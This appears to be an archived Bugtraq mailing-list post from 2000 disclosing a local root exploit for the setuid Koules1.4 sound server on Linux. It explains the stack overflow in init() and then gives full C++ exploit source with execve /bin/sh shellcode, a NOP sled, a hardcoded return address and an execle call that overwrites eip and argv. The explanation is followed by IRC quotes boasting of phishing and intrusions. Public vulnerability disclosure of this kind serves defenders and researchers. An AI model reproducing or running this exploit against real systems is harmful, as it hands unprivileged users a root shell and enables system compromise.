5753374 2000-11-20 09:10 +0100 /147 rader/ Guido Bakker <guidob@MAINNET.NL> Importerad: 2000-11-20 19:22 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: guidob@mainnet.nl Mottagare: Bugtraq (import) <13807> Ärende: local exploit for linux's Koules1.4 package ------------------------------------------------------------ From: Guido Bakker <guidob@MAINNET.NL> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <00112009101300.24798@guidob> /* Coolz.cpp - yep a C Plus Plus exploit, I like that Strings STL :) This problem has been known since April this year, but I have not seen any exploit so far. First of all I wasn't planning to go and release another ordinary stack smash, but I found the setuid game on some wargame/hackme I played on. Funny thing was that the exploitability proved to be a bit harder than I had anticipated at first. The problem can be found in the Koules1.4 package, code file: koules.sndsrv.linux.c - function: init() The `int i` disappears in the optimization gcc does. Since the strcat() function concatenates an array of filenames, `argv` gets ruined. This will cause the first run of the loop to fail. If argv point somewhere into adressable memory space, the chances of having a second pointer in there are close to zero, thus the second loop will fail. Last of all, if the argv[1] does point to a valid address the string contained there shouldn't be long enough to overwrite eip a second time, since that gets us into trouble. That's about it :) Even then, this ONLY works on machines that have compiled SVGALIB support in and NOT on the X windows version of 'koules'. Requested IRC quotes: <dagger02> ik heb jeuk aan me ballen. <marshal-> waar ben jij nu mee bezig man <sArGeAnt> nog een keer sukkel <sArGeAnt> en je ken es lekker kijken hoe packetjes je modem binnen komen <gmd-> sex ? <orangehaw> Scrippie HOU JE MOND OF Ik PACkEt Je ? ;) <silvio> chicks dig me when i place a bet, cause the mandelbrot sucks compare to the julia set <jimjones> 4 years ago there was no aol account i couldnt phish, now my unix virii grow faster than the petry dish <dugje> I've seen nasa.gov navy.mil compaq.com and microsoft.com, there is only one goal left .. *.root-servers.net. Love goes out to: Hester and Maja Shouts go out to: Aad de Bruin, Karel Roos, L.G. Weert, Louis Maatman, Richard Vriesde. -- We always did feel the same, we just saw it from a different point of view... [Bob Dylan - Tangled up in Blue] <Scrippie> vraag me af wat ze zullen doen bij klpd als ze dat lezen (: <dugje> ghehe ... je een plaatsje hoger zetten op de priority list .. -- Scrippie/ronald@grafix.nl /* /* Synnergy.net (c) 2000 */ #include <cstdio> #include <string> #include <cstdlib> #include <unistd.h> #define FILENAME "/usr/local/lib/koules/koules.sndsrv.linux" #define NOP 'A' #define NUMNOPS 500 #define RETADDY "\x90\xfe\xff\xbf" /* Since we return in the cleared environment, we don't need to have a return address we can influence by command line "offset" arguments */ string heavenlycode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char *addytostr(unsigned char *); using namespace std; main() { string payload, vector; unsigned int i; const char *env[3]; const char *ptr_to_bffffffc; /* Construction of our payload */ payload.append(NUMNOPS, NOP); payload.append(heavenlycode); env[0] = payload.c_str(); /* This memory address always contains 0x00000000 */ env[1] = "\xfc\xff\xff\xbf"; env[2] = NULL; /* Calculate for yourself, and check out: linux/fs/exec.c */ ptr_to_bffffffc = addytostr((unsigned char *)(0xc0000000-sizeof(void *)-sizeof(FILENAME) -sizeof(heavenlycode)-sizeof(char *)-1)); for(i=0;i<256;i++) { vector.append(RETADDY); /* Fill the buffer */ } /* We do NOT overwrite 'int i' - a register is used after gcc -O */ vector.append(RETADDY); /* Overwrites ebp */ vector.append(RETADDY); /* Overwrites eip */ vector.append(ptr_to_bffffffc); /* Overwrites argv argument */ execle(FILENAME, "Segmentation fault (core dumped)", vector.c_str(), "A", NULL, env); perror("execle()"); } char *addytostr(unsigned char *blaat) { char *ret; if(!(ret = (char *)malloc(sizeof(unsigned char *)+1))) { perror("malloc()"); exit(EXIT_FAILURE); } memcpy(ret, &blaat, sizeof(unsigned char *)); ret[sizeof(unsigned char *)] = 0x00; return(ret); } -- Met vriendelijke groet / Kind regards, | Guido Bakker <guidob@mainnet.nl> | Network Manager MainNet BV, http://www.mainnet.nl Phone: +31 (0)20 6133505 Fax: +31 (0)20 6135640 (5753374) --------------------------------(Ombruten)